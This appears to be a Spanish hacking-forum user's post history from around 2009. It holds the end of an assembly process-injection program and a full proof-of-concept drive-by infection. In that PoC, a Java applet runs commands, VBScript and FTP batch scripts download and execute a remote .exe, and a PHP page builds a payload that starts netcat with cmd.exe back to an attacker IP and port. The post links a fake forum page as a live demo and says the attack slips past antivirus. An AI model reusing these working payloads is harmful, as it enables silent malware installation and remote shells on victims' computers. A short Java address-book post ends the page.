inyectar invoke VirtualAllocEx,[hProceso],0,[TamañoDatos],MEM_COMMIT+MEM_RESERVE,PAGE_EXECUTE_READWRITE mov [DirFuncion],eax ;Escribimos en memoria los datos invoke WriteProcessMemory,[hProceso],[DirFuncion],FuncionInyectada,[TamañoDatos],0 ;Creamos el hilo en el proceso invoke CreateRemoteThread,[hProceso],0,0,[DirFuncion],0,0,0 ;Salimos invoke ExitProcess,0 ;\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\/// ;\\\///\\\///\\\///\\\///\ Función Que se Inyecta ///\\\///\\\///\\\/// ;\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\/// proc FuncionInyectada ;Obtenemos la dirección de memoria donde nos estamos ejecutando pushad call delta delta: pop ebp sub ebp,delta push ebp ebp pop ebx ecx ;Obtenemos la dirección donde se cargó el Mensaje y el Título add ebx,Mensaje add ecx,Titulo ;Llamamos a MessageboxA push 0 push ebx push ecx push 0 call [ebp+mMessageBoxA] ;Llamamos a ExitProcess push 0 call [ebp+mExitProcess] Titulo db 'Code Inyectado!',0 Mensaje db 'xD',0 ;Las direcciones en memoria de las apis mMessageBoxA dd ? mExitProcess dd ? endp FIN: ;\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\/// ;\\\///\\\///\\\///\\\/// Fin Función Que se Inyecta //\\\///\\\///\\\/// ;\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\/// data import library KERNEL32,'KERNEL32.DLL' import KERNEL32,\ CreateProcessA,'CreateProcessA',\ CreateRemoteThread,'CreateRemoteThread',\ WriteProcessMemory,'WriteProcessMemory',\ VirtualAllocEx,'VirtualAllocEx',\ ExitProcess,'ExitProcess',\ LoadLibrary,'LoadLibraryA',\ GetProcAddress,'GetProcAddress' end data
Está comentado e intenté escribirlo de forma clara para que sea fácil de comprender. Saludos
|
|
|
19
|
Seguridad Informática / Hacking / [POC] Infección Mediante Java Applet (y VBScript)
|
en: 1 Enero 2009, 22:50 pm
|
[POC] Infección Mediante Java Applet (y VBScript) Bueno, muchos recordarán un post dónde se explicaba como hacer un fake de una web que nos pedía un componente flash y había un link hacia un *.exe. Bueno pues mediante la ejecución de un Applet en Java y un script en VBScript o Batch, es posible descargar y ejecutar un programa remoto en un pc tan sólo con 1 click, para decir que se confía en el applet que se intenta ejecutar (el cual sale en todos los applets como pueden ser juegos y demás). Empezamos con el AppletLo primero será compilar el siguiente código en Java: import java.applet.*; import java.awt.*; import java.io.*; public class skata extends Applet { public void init() { String first = getParameter ("first"); try { f = Runtime. getRuntime(). exec(first ); } { e.printStackTrace(); } } }
Éste código ejecuta un en el pc remoto lo que se le pase como parámetro. El Applet puede ser utilizado de la suguiente manera desde un documento html: <applet width='1' height='1' code='Nombre-clase-applet.class' archive='Nombre-Applet.jar'> <param name='first' value='cmd.exe /c msg * Hola Mundo!'>
Como véis nos dá la posibilidad de ejecutar comandos de consola en un pc remoto con S.O Windows. Pero iremos un paso más allá, y descargaremos un archivo al pc, como podemos hacer ésto? Pues podemos crear códigos usando Scripting, ya sea en Batch usando ftp o en VBScript. Para crear el archivo VBS utilizamos Streams de salida en Batch: cmd.exe /c echo Comando en VBS >>C:\Archivo.vbs El siguiente código en VBScript descarga un Archivo binario y lo ejecuta: Const adTypeBinary = 1 Const adSaveCreateOverWrite = 2 Dim BinaryStream Set BinaryStream = CreateObject("ADODB.Stream") BinaryStream.Type = adTypeBinary BinaryStream.Open BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite Function BinaryGetURL(URL) Dim Http Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") Http.Open "GET", URL, False Http.Send BinaryGetURL = Http.ResponseBody End Function Set shell = CreateObject("WScript.Shell") shell.Run "cmd.exe /c C:\archivo.exe"
Su funcionamiento es muy sencillo: Codigo.vbs http://www.pagina.com/archivo.exe C:\archivo.exe Tambien se podría hacer sin necesidad de ningún archivo vbs ejecutando el ftp de la línea de comandos, aunque seguimos con el caso de vbs que es el ejemplo que puso el autor y es mas "general". Aquí un ejemplo de como descargar el archivo usando ftp desde la shell: @echo off echo usuario@nombreftp.com>C:\datos.txt echo contraseña>>C:\datos.txt echo cd /path>>C:\datos.txt echo pwd>>C:\datos.txt echo binary>>C:\datos.txt echo get archivo.exe>>C:\datos.txt echo bye>>C:\datos.txt echo quit>>C:\datos.txt ftp -s:C:\datos.txt nombreftp.com start archivo.exe El archivo descargado (en nuestro ejemplo [al final del post]) lo único que nos da es una advertencia y la ip y el puerto que le pasamos por php. Lo de la ip y el puerto funciona gracias a un sencillo código PHP: <?php if(isset($HTTP_GET_VARS["ip"])) { $ip = $HTTP_GET_VARS["ip"]; } else $ip = 127.0.0.1; if(isset($HTTP_GET_VARS["puerto"])) { $puerto = $HTTP_GET_VARS["puerto"]; } else $port = 7173; echo ' <applet width="1" height="1" code="nombreclaseapplet.class" archive="nombreapplet.jar"> <param name="first" value="cmd.exe /c echo Const adTypeBinary = 1 > C:\windows\apsou.vbs & echo Const adSaveCreateOverWrite = 2 >> C:\windows\apsou.vbs & echo Dim BinaryStream >> C:\windows\apsou.vbs & echo Set BinaryStream = CreateObject(\"ADODB.Stream\") >> C:\windows\apsou.vbs & echo BinaryStream.Type = adTypeBinary >> C:\windows\apsou.vbs & echo BinaryStream.Open >> C:\windows\apsou.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> C:\windows\apsou.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> C:\windows\apsou.vbs & echo Function BinaryGetURL(URL) >> C:\windows\apsou.vbs & echo Dim Http >> C:\windows\apsou.vbs & echo Set Http = CreateObject(\"WinHttp.WinHttpRequest.5.1\") >> C:\windows\apsou.vbs & echo Http.Open \"GET\", URL, False >> C:\windows\apsou.vbs & echo Http.Send >> C:\windows\apsou.vbs & echo BinaryGetURL = Http.ResponseBody >> C:\windows\apsou.vbs & echo End Function >> C:\windows\apsou.vbs & echo Set shell = CreateObject(\"WScript.Shell\") >> C:\windows\apsou.vbs & echo shell.Run \"C:\windows\update.exe -d -e cmd.exe '.$ip.' '.$puerto.'\" >> C:\windows\apsou.vbs"> </applet>'; ?>
Con este código lo que hacemos es editar el código VBs para que ejecute el archivo descargado, pasando como parámetros la ip y el puerto introducidos en la URL. Para que tengan una mejor idea de lo que digo les dejo el código en C++ del programa que se descarga en el ejemplo: #include <iostream> using namespace std; int main(int argc, char* argv[]) { cout << "Este ejecutable puede ser reemplazado un troyano, backdoor, virus, netcat, etc." << endl; cout << "Por lo tanto nunca hay que fiarse de applets sin firmas certificadas" << endl; cout << "La ip introducida mediante PHP es " << argv[1] << endl; cout << "El puerto introducido mediante PHP es " << argv[2] << endl; }
Las variables de la url en php se pasan al VBS. Al ejecutar el VBS éste ejecuta nuestro archivo.exe con los parámetros. Pudiendo hacer esto, las posibilidades que ofrece este método son infinitas... Se puede mandar cualquier programa y ejecutarlo sin que el usuario sospeche nada, imagina que mandamos un netcat con los parámetros para que nos pase una shell, o que mandamos un troyano o lo que sea. Nuevamente digo, las posibilidades son infinitas. Les dejamos una prueba de concepto en el siguiente link: http://wofo.x10hosting.com/hacking/JAVA/POCapplet/index.php?board=127.0.0.1&topic=7765Otra poc usando ftp desde la línea de comandos, sin necesidad de vbs: http://wofo.x10hosting.com/hacking/JAVA/POCapplet/indexftp.php?board=127.0.0.1&topic=7765Como verán, es un fake muy convincente de un post del foro (fake hecho por HACKER_ZERO). Lo que hace es, cuando ejecutan el applet, crea el codigo en .vbs y lo ejecuta, el cual se encarga de descargar el archivo.exe y ejecutarlo con los parámetros. Ambos archivos se descargan en C:\Windows como apsou.vbs y update.exe. Testeado usando netcat en: - Firefox 3.05, Windows XP SP3 con Firewall de Windows, NOD32 y su Firewall activo. - IE Windows XP SP3 con Firewall de Windows, NOD32 y su Firewall activo. - Firefox 3.05, Windows XP SP2 con Firewall de Windows, Avast y su Firewall activo. (Gracias Shell Killer )
Cualquier duda o pregunta la recibimos con los brazos abiertos. Salu2
|
|
|
20
|
Programación / Java / [Source] Agenda Gráfica
|
en: 15 Diciembre 2008, 21:29 pm
|
Bueno, pues inspirándome en el source de Burnhack, aquí va mi primer programa en java, la agenda tene interfaz gráfica y guarda los datos en un .txt por lo que no los pierde al cerrar, no tiene mucho mas . Haber si alguien me puede decir como mejorarla o que partes podrían estar mejor ya que es mi primero programa en Java y tambien en POO que no es lo mío. Una imagen: No pongo el source aquí ya que el code está muy comentado y se cortarían las líneas, mejor lo véis con un compilador a pantalla completa, jeje. Descargar BinariosDescargar SourceSaludos
|
|
|
|
|
|
|